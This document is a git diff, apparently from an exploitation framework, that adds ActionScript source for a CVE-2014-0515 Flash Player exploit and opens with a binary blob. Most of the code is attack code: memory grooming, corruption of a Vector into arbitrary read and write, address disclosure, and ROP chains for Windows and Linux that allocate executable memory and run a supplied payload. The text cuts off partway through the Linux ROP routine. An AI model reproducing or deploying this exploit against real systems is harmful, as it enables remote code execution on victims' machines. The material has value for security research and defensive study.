z8DYstYS3hy<u?&Z3hW99PC<GFQO*w&%81t|gw>!dFS5wc4wEef!q*-dHwe|i0WBxd
ziiK^aqH@l;2*BrNgqZMU-*<hJ#w=@;%mx2;x!|Al^Ar(VRTFLi%K53ANlaw#AB}0*
zXTzRh<#?^+{p?%n3v;KFP2hM9Gpf&Zd3m%`z^OflXYN5E4O8d??nkv?0}^-@8(GbR
zQ`V&}Y4eGSKM*(LD$8jS^$RQ&X&YNNChcM4c~A6r98PhyCC^|MGPI{yJ_%hqtU7DP
zJD^SbbDa>hiso#P>ww$;AMhO%4jft5GPiQxy{Rn9{EpnlWEohZYO(rqkW`}W9JJF}
zkowBaj|i6Ap}|{p(rLw*sE9WfX_u}KAF4Mjz0A;%g*P;edRB8@uj0D^@1zx9Ka+<2
zjG57BfTYy;U~C0~V<emI5Bu5(N@UJuSRk5XfKM+%zDO@t3c14Ddw%3jGD4^&#AnQC
zzzx;63551+DQuV@PnrF|W2-O{#QYdhJC$J>SESH~TE^92wW*C+293k971{gFTlghv
zT4{JQp1k4rY&=4|>>PM7WG1bNGJ+NeDGLfHZm6`I-~*uhb$0J|;A=nPGcPxt<9bl{
z^MtuB*tza_SEGRRvMN<!zW~M*EQBr!r1h}#<{iop--Bk`prR4lAd{atVu@(wwM8;g
zf#s%3?9cyL)M}i)88Yk{AuN-KRU`zfEgW;J;OrY!?}AF$1~EuU=}V6ttL!VUARPm?
zhD+<p1swna2sqjO5N5B`CUj}g`Y4U~u`is0(p!&NV{~O?2CbcFA)?QDO;&5?EP`5U
zKj{$~N7nw~J7x*Rt^QBD!f~*^S04jB+QVe2^9Qmyc9PLcIWk(W(Gj4oC2$uExAaza
zx~6g|R}^fsru2EwWl4<4jcdN`aCqDPNzyNi`M8BxA%descJRa{ZCAoBxRJ~3)i0(r
z1Yn-FRy(b@0et}YFs1E^nFHNwL~T8Sp5$UXG%W%OIf2|48KtJA)rnL)4-oHKz1+C*
zm4`u^3zH`0dXKp*1O3Ak5;tG<VBx75SCVAv>bV9;zwD#Oy0%RWW?l~rb=hF^h7X1Z
z^p)dQa~k@=Iaxn~ME;f+<NA=4D9)Bj987(N0HcTuk>%IoV9##XKQ6E!#;D1U(f~JS
z1Uu|_l2xB2g`I1d52E*Fx)s^f)M!pB`h*Tgz2S<ICHmM@qpAj@1;Tg?@_EJ%I$6^r
z0$8coH%(X%U9T9|Nq?BeWsPOS+vJIDO3@LhDM8@b+VR!E^;N=ldx(m}vdyaBZMCqh
zcgO$>5m*B`SVRAeG8zHo1xu}f2#(m!fX9VfM&awZ^LqN7YFKfPunr+973)%RpW30V
zpp(}Tpt^Y{WAQBp>n=$j8qc|Eo$tC%_k-C`q+Yv@1w;o$K9@C+%NLYEu<M%$&<)W`
zP{&~@r^gTgx-(i&DdCEr41d=8A2-B2crqT?@Ok6#GYzyqp8#`3@p4oa4RlJkAW@~M
zQRs&k;PdmhWpz<@1_xGt?U6p_M|O%fqU$Y2OxBHwjv^nHcZUWq^al*vo>v~?0)*ag
zBf?C!Np0Zn?VSl+kuB-HS!M56+J)AVhC+=#EF^hc#2p2sG+j#!W*?H(Al~lI-nyRS
z>eo~$%kIE@u=pKV=SplY7f^j;JAo6)204NxvSPShrl#JivV`F>*Op1l+3qa-qv_Ns
zxw`L@EAkmKRu4^mmdBn)WTl9Z$^Qbo+Q{(edVoLY;|tePpRxj+=&088E2L}V)oye0
z;jjV}>H6l{XK|2581szYC5;E~+nKo;3D(?*#ZvGV0WF?DU9o?R{X#=$4s<>M3|p3H
z(xXJ<faZcPOZ?iLfnd3h^iu@CrC1Z*y35a8va@X4G+JX#cm5KpV`~L2vuM@sEyl7d
zUdn{B=Yh4CA(V`fnKMv0Y&0juZY~TtCg<?gIGg>o8Wb$g=}~t#7&QS1`gbs7DAk^k
zLK`{vBAM9x3{_hc!q|TiqR5RK98P?P_eX`fuag=eh9ye3nN_{JT$026=ZZ}e_;#2T
z;ECSq7I8kl1v++ZQ42%PA^lp*AeXhj0Od&iV5^qo;WW>?k>_fsz8J}Zy!{`eZ7)rm
zAfU|gMO&Ne#rkDau*x1NNuNWSk~YLTsqASO)4xVpRZHZO=(Th2tMt^HlWPlcUB=Lg
zMBBi`B3oO;+5qT5<-l`LVhIgoLBe94z!Y?;8?ZMzg3ni!2peo$XFcP293&WE)g9Q|
zVRBkro3^Z%b30_Xc<mjD*^vN>j_3`mq~`dyT)-hg&2^lET30Z94%u3HBce^UPd`S~
zzzk=j^ta^B#39-^azyjlo)ckX&Gz#jv0x|5Oa_XOj|NlML`<CV4^;Fn)CeCkVt(Fe
zuFCjSEX^6o!48U`2opNBO?yg!@!RZoATw6*RFG@PpvYDO|5uLdrarAh(nG`@@GVFd
z>X%lC@>fOj4aKA$lSe0}>&Ib1c^R0r^YBbFHX0AfC;0z=_JS&^b_V#bO0$uJ*kJ9i
z-SND^9-lfkh!=4e%s{d!6GB}HaU*TvP%i!z_XXchn{SYWgPK+LRPlvC(#A_^Y!D@P
zapxCywPCMp$#FO{NIkFLm6!qyXs|*SEw9xK!`kkHo0;KgLyi-m5!jAg_C#fw2@<qF
zzEw{M>zoxmQ%fAV(rOvPXSL-yEb{H4@;v7LQ<W-m@Bg0q50p6)OkarTF9l#pSaXqI
zk6Hbxu0rH6zvj;JfU(bi-M73my-G2(s3q-Q6WxbBH1KENU9V!GQY3PNusTy4o6nm(
zV|q9zHoqSAK+&QvE&1V4eh%Xj9XA=#5r`)#B;lA^!E6oA;}i~WD2ZZ`qY}UT+Kbr4
wL;F75X9M6W-Yle6Orkv}xXS6z*%ZK$i#1n)m?t12B`4<kaP>;0|Nef!!y#|G`~Uy|

literal 0
HcmV?d00001

diff --git a/external/source/exploits/CVE-2014-0515/Elf.as b/external/source/exploits/CVE-2014-0515/Elf.as
new file mode 100644
index 0000000000..ee7283c61c
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0515/Elf.as
@@ -0,0 +1,235 @@
+package
+{
+    public class Elf
+    {
+        private const PT_DYNAMIC:uint = 2
+        private const PT_LOAD:uint = 1 
+        private const PT_READ_EXEC:uint = 5
+        private const DT_SYMTAB:uint = 6
+        private const DT_STRTAB:uint = 5
+        private const DT_PLTGOT:uint = 3
+
+        private var e_ba:ExploitByteArray
+        // elf base address
+        public var base:uint = 0
+        // program header address
+        public var ph:uint = 0
+        // number of program headers
+        public var ph_size:uint = 0
+        // program header entry size
+        public var ph_esize:uint = 0
+        // DYNAMIC segment address
+        public var seg_dynamic:uint = 0
+        // DYNAMIC segment size
+        public var seg_dynamic_size:uint = 0
+        // CODE segment address
+        public var seg_exec:uint = 0
+        // CODE segment size
+        public var seg_exec_size:uint = 0
+        // .dynsyn section address
+        public var sec_dynsym:uint = 0
+        // .synstr section address
+        public var sec_dynstr:uint = 0
+        // .got.plt section address
+        public var sec_got_plt:uint = 0
+         
+        public function Elf(ba:ExploitByteArray, addr:uint) 
+        {
+            e_ba = ba
+            set_base(addr)
+            set_program_header()
+            set_program_header_size()
+            set_program_header_entry_size()
+            set_dynamic_segment()
+            set_exec_segment()
+            set_dynsym()
+            set_dynstr()
+            set_got_plt()
+        }
+
+        public function external_symbol(name:String):uint {
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+            var got_plt_index:uint = 0
+
+            for(var i:uint = 0; i < 1000; i++) { // 1000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return e_ba.read(sec_got_plt + 0xc + (got_plt_index * 4))
+                }
+                if (st_info != 0x11) {
+                    got_plt_index++
+                }
+            }
+            throw new Error()  
+        }
+
+        public function symbol(name:String):uint {           
+            var entry:uint = 0
+            var st_name:uint = 0
+            var st_value:uint = 0
+            var st_size:uint = 0
+            var st_info:uint = 0
+            var st_other:uint = 0
+            var st_shndx:uint = 0
+            var st_string:String = ""
+
+            for(var i:uint = 0; i < 3000; i++) { // 3000 is just a limit
+                entry = sec_dynsym + 0x10 + (i * 0x10)
+                st_name = e_ba.read(entry)
+                st_value = e_ba.read(entry + 4)
+                st_info = e_ba.read(entry + 0xc, "byte")
+                st_string = e_ba.read_string(sec_dynstr + st_name)
+                if (st_string == name) {
+                    return base + st_value
+                }
+            }
+            throw new Error()  
+        }
+
+
+        public function gadget(gadget:String, hint:uint):uint
+        {
+            var value:uint = parseInt(gadget, 16)
+            var contents:uint = 0
+            for (var i:uint = 0; i < seg_exec_size - 4; i++) {
+                contents = e_ba.read(seg_exec + i)
+                if (hint == 0xffffffff && value == contents) {
+                    return seg_exec + i
+                } 
+                if (hint != 0xffffffff && value == (contents & hint)) { 
+                    return seg_exec + i
+                }
+            }
+            throw new Error()
+        } 
+ 
+        private function set_base(addr:uint):void
+        {
+            addr &= 0xffff0000
+            while (true) {
+                if (e_ba.read(addr) == 0x464c457f) {
+                    base = addr
+                    return
+                }
+                addr -= 0x1000
+            }
+            
+            throw new Error()
+        }  
+ 
+        private function set_program_header():void
+        {
+            ph = base + e_ba.read(base + 0x1c)
+        }
+    
+        private function set_program_header_size():void
+        {
+            ph_size = e_ba.read(base + 0x2c, "word")
+        } 
+
+        private function set_program_header_entry_size():void
+        {
+            ph_esize = e_ba.read(base + 0x2a, "word")
+        }
+    
+        private function set_dynamic_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                if (p_type == PT_DYNAMIC) {
+                    seg_dynamic = base + e_ba.read(entry + 8)
+                    seg_dynamic_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+
+            throw new Error()
+        }
+
+        private function set_exec_segment():void
+        {
+            var entry:uint = 0
+            var p_type:uint = 0
+            var p_flags:uint = 0
+            
+            for (var i:uint = 0; i < ph_size; i++) {
+                entry = ph + (i * ph_esize)
+                p_type = e_ba.read(entry)
+                p_flags = e_ba.read(entry + 0x18)
+                if (p_type == PT_LOAD && (p_flags & PT_READ_EXEC) == PT_READ_EXEC) {
+                    seg_exec = base + e_ba.read(entry + 8)
+                    seg_exec_size = e_ba.read(entry + 0x14)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+ 
+        private function set_dynsym():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_SYMTAB) {
+                    sec_dynsym = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_dynstr():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_STRTAB) {
+                    sec_dynstr = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+
+        private function set_got_plt():void
+        {
+            var entry:uint = 0
+            var s_type:uint = 0
+
+            for (var i:uint = 0; i < seg_dynamic_size; i = i + 8) {
+                entry = seg_dynamic + i
+                s_type = e_ba.read(entry)
+                if (s_type == DT_PLTGOT) {
+                    sec_got_plt = e_ba.read(entry + 4)
+                    return
+                }
+            }
+            
+            throw new Error()
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2014-0515/Exploit.as b/external/source/exploits/CVE-2014-0515/Exploit.as
new file mode 100755
index 0000000000..7270d46963
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0515/Exploit.as
@@ -0,0 +1,140 @@
+//compile with AIR SDK 13.0: mxmlc Exploit.as -o Exploit.swf
+package {
+	import flash.display.Sprite
+	import flash.utils.ByteArray
+	import flash.display.Shader
+	import flash.system.Capabilities
+	import flash.utils.Endian
+	import __AS3__.vec.Vector
+	import __AS3__.vec.*
+	import flash.display.LoaderInfo
+    import mx.utils.Base64Decoder
+	
+	public class Exploit extends Sprite {
+		
+		protected var Shad:Class
+		private var uv:Vector.<uint>
+        private var b64:Base64Decoder = new Base64Decoder()
+        private var payload:ByteArray
+        private var platform:String
+        private var os:String
+    	private var exploiter:Exploiter
+		
+		public function Exploit(){
+            platform = LoaderInfo(this.root.loaderInfo).parameters.pl
+            os = LoaderInfo(this.root.loaderInfo).parameters.os
+            var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+            var pattern:RegExp = / /g;
+            b64_payload = b64_payload.replace(pattern, "+")
+            b64.decode(b64_payload)
+            payload = b64.toByteArray()
+            
+            var shader:Shader
+            if (platform == "linux") {
+                this.Shad = GraphShadLinux
+            } else {
+                this.Shad = GraphShadWindows
+            }
+                        
+			super()
+			var i:* = 0
+			var j:* = 0
+			var offset:int = -1
+			var corrupted_vector_idx:int = -1
+            						
+			// Memory massage
+			Logger.log("Memory massage")
+			var array_length:uint = 0x10000
+			var vector_size:uint = 34
+			var array:Array = new Array()
+
+			i = 0
+			while (i < array_length)
+			{
+				array[i] = new Vector.<uint>(vector_size)
+				i++;
+			}
+			
+			i = 0
+			while (i < array_length)
+			{
+				array[i].length = 0
+				i++
+			}
+			
+			i = 0x0200
+			while (i < array_length)
+			{
+				array[(i - (2 * (j % 2)))].length = 0x0100
+				array[(i - (2 * (j % 2)))][0] = 0xdeedbeef
+				array[(i - (2 * (j % 2)))][1] = 0xdeadbeef
+				array[(i - (2 * (j % 2)))][2] = (i - (2 * (j % 2)))
+				i = (i + 28)
+				j++
+			}
+			
+			// Overflow and Search for corrupted vector
+			Logger.log("Overflow and Search for corrupted vector")
+			var shadba:ByteArray = (new this.Shad() as ByteArray)
+			shadba.position = 232
+			if (Capabilities.os.indexOf("Windows 8") >= 0)
+			{
+				shadba.writeUnsignedInt(2472)
+			}
+			shadba.position = 0
+
+			Logger.log("corrupting")
+			
+			shader = new Shader()
+			try
+			{
+				shader.byteCode = (new this.Shad() as ByteArray);
+			} catch(e) { }
+			
+			i = 0
+			while (i < array_length)
+			{
+				if (array[i].length > 0x0100)
+				{
+					corrupted_vector_idx = i
+					break
+				}
+				i++
+			}
+			
+			if (corrupted_vector_idx == -1) {
+				Logger.log("Exploit - Corrupted vector not found.")
+				return
+			}
+			
+			for(i = 0; i < array[corrupted_vector_idx].length; i++) {
+				if (array[corrupted_vector_idx][i] == 0x0100 && array[corrupted_vector_idx][i + 2] == 0xdeedbeef) {
+					Logger.log("w00t!, found, corrupting ")
+					array[corrupted_vector_idx][i] = 0xffffffff
+					offset = i
+					break
+				}
+			}
+			
+			if (offset == -1) {
+				Logger.log("Exploit - Secondary vector not corrupted")
+				return
+			}
+
+
+			for(i = 0; i < array.length; i++) {
+				if (array[i].length == 0xffffffff) {
+					Logger.log("super corrupted found")
+					uv = array[i]
+					Logger.log("corrupted vector before fixing : " + array[corrupted_vector_idx].length.toString())
+					uv[0x3ffffffc - offset] = 34
+					Logger.log("corrupted vector before fixing : " + array[corrupted_vector_idx].length.toString())
+				}
+			}
+			Logger.log('done? Exploiting!')
+            exploiter = new Exploiter(this, platform, os, payload, uv)
+//			uv[0x3ffffffe] = 0x100
+//			Logger.log(uv.length.toString())
+		}
+	}
+}//package 
diff --git a/external/source/exploits/CVE-2014-0515/ExploitByteArray.as b/external/source/exploits/CVE-2014-0515/ExploitByteArray.as
new file mode 100644
index 0000000000..a8da46df7b
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0515/ExploitByteArray.as
@@ -0,0 +1,85 @@
+package
+{
+    import flash.utils.ByteArray
+    
+    public class ExploitByteArray
+    {
+        private const MAX_STRING_LENGTH:uint = 100
+        public var ba:ByteArray
+        public var original_length:uint
+        private var platform:String
+
+        public function ExploitByteArray(p:String, l:uint = 1024)
+        {
+            ba = new ByteArray()
+            ba.length = l
+            ba.endian = "littleEndian"
+            ba.writeUnsignedInt(0)
+            platform = p
+            original_length = l
+        }
+
+        public function set_length(length:uint):void
+        {
+            ba.length = length
+        }
+
+        public function get_length():uint
+        {
+            return ba.length
+        }
+
+        public function lets_ready():void
+        {
+            ba.endian = "littleEndian"
+            if (platform == "linux") {
+                ba.length = 0xffffffff
+            } 
+        }
+
+        public function is_ready():Boolean
+        {
+            if (ba.length == 0xffffffff)
+                return true
+
+            return false
+        }
+
+        public function read(addr:uint, type:String = "dword"):uint
+        {
+            ba.position = addr
+            switch(type) {
+                case "dword": 
+                    return ba.readUnsignedInt()
+                case "word":
+                    return ba.readUnsignedShort()
+                case "byte":
+                    return ba.readUnsignedByte()
+            }
+            return 0
+        }
+
+        public function read_string(addr:uint, length:uint = 0):String
+        {
+            ba.position = addr
+            if (length == 0)
+                return ba.readUTFBytes(MAX_STRING_LENGTH)
+            else
+                return ba.readUTFBytes(length) 
+        }
+
+        public function write(addr:uint, value:* = 0, zero:Boolean = true):void
+        {
+            var i:uint
+
+            if (addr) ba.position = addr
+            if (value is String) {
+                for (i = 0; i < value.length; i++) ba.writeByte(value.charCodeAt(i))
+                if (zero) ba.writeByte(0)
+            } else if (value is ByteArray) {
+                var value_length:uint = value.length
+                for (i = 0; i < value_length; i++) ba.writeByte(value.readByte())
+            } else ba.writeUnsignedInt(value)
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2014-0515/ExploitVector.as b/external/source/exploits/CVE-2014-0515/ExploitVector.as
new file mode 100644
index 0000000000..d0283d803e
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0515/ExploitVector.as
@@ -0,0 +1,74 @@
+package
+{
+    public class ExploitVector
+    {
+        private var uv:Vector.<uint>
+        public var original_length:uint = 0x100 
+        
+        public function ExploitVector(v:Vector.<uint>)
+        {
+            uv = v
+        }
+
+        public function restore():void
+        {
+            uv[0x3ffffffe] = original_length
+        }
+
+        public function is_ready():Boolean
+        {
+            if (uv.length > original_length) 
+            {
+                return true
+            }
+            return false
+        } 
+        
+        public function at(pos:uint):uint
+        {
+            return uv[pos]
+        }
+
+        // pos: position where a Vector.<Object>[0] lives
+        public function set_own_address(pos:uint):void
+        {
+            uv[0] = uv[pos - 5] - ((pos - 5) * 4) - 0xc
+        }
+
+        public function read(addr:uint):uint
+        {
+            var pos:uint = 0
+
+            if (addr > uv[0]) {
+                pos = ((addr - uv[0]) / 4) - 2
+            } else {
+                pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
+            }
+
+            return uv[pos]
+        }
+
+        public function write(addr:uint, value:uint = 0):void
+        {           
+            var pos:uint = 0
+
+            if (addr > uv[0]) {
+                pos = ((addr - uv[0]) / 4) - 2
+            } else {
+                pos = ((0xffffffff - (uv[0] - addr)) / 4) - 1
+            }
+
+            uv[pos] = value
+        }
+
+        public function search_pattern(pattern:uint, limit:uint):uint
+        {
+            for (var i:uint = 0; i < limit/4; i++) {
+                if (uv[i] == pattern) {
+                    return i
+                }
+            }
+            throw new Error() 
+        }
+    }
+}
diff --git a/external/source/exploits/CVE-2014-0515/Exploiter.as b/external/source/exploits/CVE-2014-0515/Exploiter.as
new file mode 100644
index 0000000000..0a971409f6
--- /dev/null
+++ b/external/source/exploits/CVE-2014-0515/Exploiter.as
@@ -0,0 +1,399 @@
+package
+{ 
+    import flash.utils.ByteArray
+    import flash.system.System
+
+    public class Exploiter
+    {
+        private const VECTOR_OBJECTS_LENGTH:uint = 1014
+        private var exploit:Exploit
+        private var ev:ExploitVector
+        private var eba:ExploitByteArray
+        private var payload:ByteArray
+        private var platform:String
+        private var op_system:String
+        private var pos:uint
+        private var byte_array_object:uint
+        private var main:uint
+        private var stack_object:uint
+        private var payload_space_object:uint
+        private var buffer_object:uint
+        private var buffer:uint
+        private var vtable:uint
+        private var stack_address:uint
+        private var payload_address:uint 
+        private var stack:Vector.<uint> = new Vector.<uint>(0x6400)
+        private var payload_space:Vector.<uint> = new Vector.<uint>(0x6400) 
+        private var spray:Vector.<Object> = new Vector.<Object>(90000)
+
+        public function Exploiter(exp:Exploit, pl:String, os:String, p:ByteArray, uv:Vector.<uint>):void
+        {
+            exploit = exp
+            payload = p
+            platform = pl
+            op_system = os
+
+            ev = new ExploitVector(uv)
+            if (!ev.is_ready()) return
+            eba = new ExploitByteArray(platform)
+            spray_objects()
+            try { pos = search_objects() } catch (err:Error) { ev.restore(); cleanup(); return; }
+            ev.set_own_address(pos)
+            if (!disclose_objects()) { ev.restore(); cleanup(); return; }
+            disclose_addresses()
+            corrupt_byte_array()
+            if (!eba.is_ready()) { ev.restore(); cleanup(); return }
+            do_rop()
+            restore_byte_array()
+            ev.restore()
+            cleanup()
+        }
+
+        private function spray_objects():void
+        {
+            Logger.log("[*] Exploiter - spray_objects()")
+            for (var i:uint = 0; i < spray.length; i++) 
+            {
+				spray[i] = new Vector.<Object>(VECTOR_OBJECTS_LENGTH)
+				spray[i][0] = eba.ba
+				spray[i][1] = exploit 
+				spray[i][2] = stack
+				spray[i][3] = payload_space
+            } 
+        }
+        
+        private function search_objects():uint
+        {
+            Logger.log("[*] Exploiter - search_objects()")
+            var idx:uint = ev.search_pattern(VECTOR_OBJECTS_LENGTH, 0xac100)
+            return idx + 1
+        }
+
+        private function disclose_objects():Boolean
+        { 
+            Logger.log("[*] Exploiter - disclose_objects()")
+            byte_array_object = ev.at(pos) - 1
+            main = ev.at(pos + 1) - 1
+            stack_object = ev.at(pos + 2) - 1
+            payload_space_object = ev.at(pos + 3) - 1
+            if (byte_array_object < 0x1000 || main < 0x1000 || stack_object < 0x1000 || payload_space_object < 0x1000) {
+                return false
+            }
+            return true
+        }
+
+        private function disclose_addresses():void
+        {
+            Logger.log("[*] Exploiter - disclose_addresses()")
+            if (platform == "linux") 
+            {
+                buffer_object = ev.read(byte_array_object + 0x10)
+                buffer = ev.read(buffer_object + 0x1c)
+            }    
+            else if (platform == "win") 
+            {
+                buffer_object = ev.read(byte_array_object + 0x40)
+                buffer = ev.read(buffer_object + 8)
+            }
+            vtable = ev.read(main)
+            stack_address = ev.read(stack_object + 0x18)
+            payload_address = ev.read(payload_space_object + 0x18)
+        }
+        
+        private function corrupt_byte_array():void
+        {
+            Logger.log("[*] Exploiter - corrupt_byte_array(): " + platform)
+            if (platform == "linux")
+            {
+                ev.write(buffer_object + 0x1c) // *array
+                ev.write(buffer_object + 0x20, 0xffffffff) // capacity
+            } 
+            else if (platform == "win")
+            {
+                ev.write(buffer_object + 8) // *array
+                ev.write(buffer_object + 16, 0xffffffff) // capacity
+            }
+            eba.lets_ready()
+        }
+
+        private function restore_byte_array():void
+        { 
+            Logger.log("[*] Exploiter - restore_byte_array(): " + platform)
+            if (platform == "linux")
+            {
+                ev.write(buffer_object + 0x1c, buffer) // *array
+                ev.write(buffer_object + 0x20, 1024) // capacity
+            } 
+            else if (platform == "win")
+            {
+                ev.write(buffer_object + 8, buffer) // *array
+                ev.write(buffer_object + 16, 1024) // capacity
+            }
+            eba.set_length(eba.original_length) 
+        }
+        
+        private function do_rop():void
+        {
+            Logger.log("[*] Exploiter - do_rop()")
+            if (platform == "linux") {
+                do_rop_linux()
+            } else if (platform == "win") {
+                if (op_system == "Windows 8.1") {
+                    do_rop_windows8()
+                } else if (op_system == "Windows 7") {
+                    do_rop_windows()
+                } else {
+                    return
+                }
+            } else {
+                return
+            }
+        }
+
+        private function do_rop_windows():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var kernel32:uint = pe.module("kernel32.dll", winmm)            
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernel32)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernel32)
+            var createthread:uint = pe.procedure("CreateThread", kernel32)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7f6e0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+           
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+            exploit.toString() // call method in the fake vtable
+        }
+
+        private function do_rop_windows8():void
+        {
+            Logger.log("[*] Exploiter - do_rop_windows8()")
+            var pe:PE = new PE(eba)
+            var flash:uint = pe.base(vtable)
+            var winmm:uint = pe.module("winmm.dll", flash)
+            var advapi32:uint = pe.module("advapi32.dll", flash)
+            var kernelbase:uint = pe.module("kernelbase.dll", advapi32)
+            var kernel32:uint = pe.module("kernel32.dll", winmm) 
+            var ntdll:uint = pe.module("ntdll.dll", kernel32)
+            var virtualprotect:uint = pe.procedure("VirtualProtect", kernelbase)
+            var virtualalloc:uint = pe.procedure("VirtualAlloc", kernelbase)
+            var createthread:uint = pe.procedure("CreateThread", kernelbase)
+            var memcpy:uint = pe.procedure("memcpy", ntdll)
+            var xchgeaxespret:uint = pe.gadget("c394", 0x0000ffff, flash)
+            var xchgeaxesiret:uint = pe.gadget("c396", 0x0000ffff, flash)
+            var addespcret:uint = pe.gadget("c30cc483", 0xffffffff, ntdll)
+            
+            // Continuation of execution
+            eba.write(buffer + 0x10, "\xb8", false); eba.write(0, vtable, false) // mov eax, vtable
+            eba.write(0, "\xbb", false); eba.write(0, main, false) // mov ebx, main
+            eba.write(0, "\x89\x03", false) // mov [ebx], eax
+            eba.write(0, "\x87\xf4\xc3", false) // xchg esp, esi # ret
+
+            // Put the payload (command) in memory
+            eba.write(payload_address + 8, payload, true); // payload
+
+            // Put the fake vtabe / stack on memory
+            eba.write(stack_address + 0x18070, xchgeaxespret) // Initial gadget (stackpivot); from @hdarwin89 sploits, kept for reliability...
+            eba.write(stack_address + 0x180a4, xchgeaxespret) // Initial gadget (stackpivot); call    dword ptr [eax+0A4h]
+            eba.write(stack_address + 0x18000, xchgeaxesiret) // fake vtable; also address will become stack after stackpivot
+            eba.write(0, virtualprotect)
+
+            // VirtualProtect
+            eba.write(0, virtualalloc)
+            eba.write(0, buffer + 0x10)
+            eba.write(0, 0x1000)
+            eba.write(0, 0x40)
+            eba.write(0, buffer + 0x8) // Writable address (4 bytes)
+
+            // VirtualAlloc
+            eba.write(0, memcpy)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0x4000)
+            eba.write(0, 0x1000 | 0x2000) // MEM_COMMIT | MEM_RESERVE
+            eba.write(0, 0x40) // PAGE_EXECUTE_READWRITE
+
+            // memcpy
+            eba.write(0, addespcret) // stack pivot over arguments because ntdll!memcpy doesn't
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, payload_address + 8)
+            eba.write(0, payload.length) 
+
+            // CreateThread
+            eba.write(0, createthread)
+            eba.write(0, buffer + 0x10) // return to fix things
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0x7ffd0000)
+            eba.write(0, 0)
+            eba.write(0, 0)
+            eba.write(0, 0)
+
+            eba.write(main, stack_address + 0x18000) // overwrite with fake vtable
+            exploit.toString() // call method in the fake vtable
+        }
+
+        private function do_rop_linux():void
+        {
+            Logger.log("[*] Exploiter - do_rop_linux()")
+            var flash:Elf = new Elf(eba, vtable)
+            var feof:uint = flash.external_symbol('feof')
+            var libc:Elf = new Elf(eba, feof)
+            var popen:uint = libc.symbol("popen")
+            var mprotect:uint = libc.symbol("mprotect")
+            var mmap:uint = libc.symbol("mmap")
+            var clone:uint = libc.symbol("clone")
+            var xchgeaxespret:uint = flash.gadget("c394", 0x0000ffff)
+            var xchgeaxesiret:uint = flash.gadget("c396", 0x0000ffff)
+            var addesp2cret:uint = flash.gadget("c32cc483", 0xffffffff)
+
+            // Continuation of execution
+            // 1) Recover original vtable
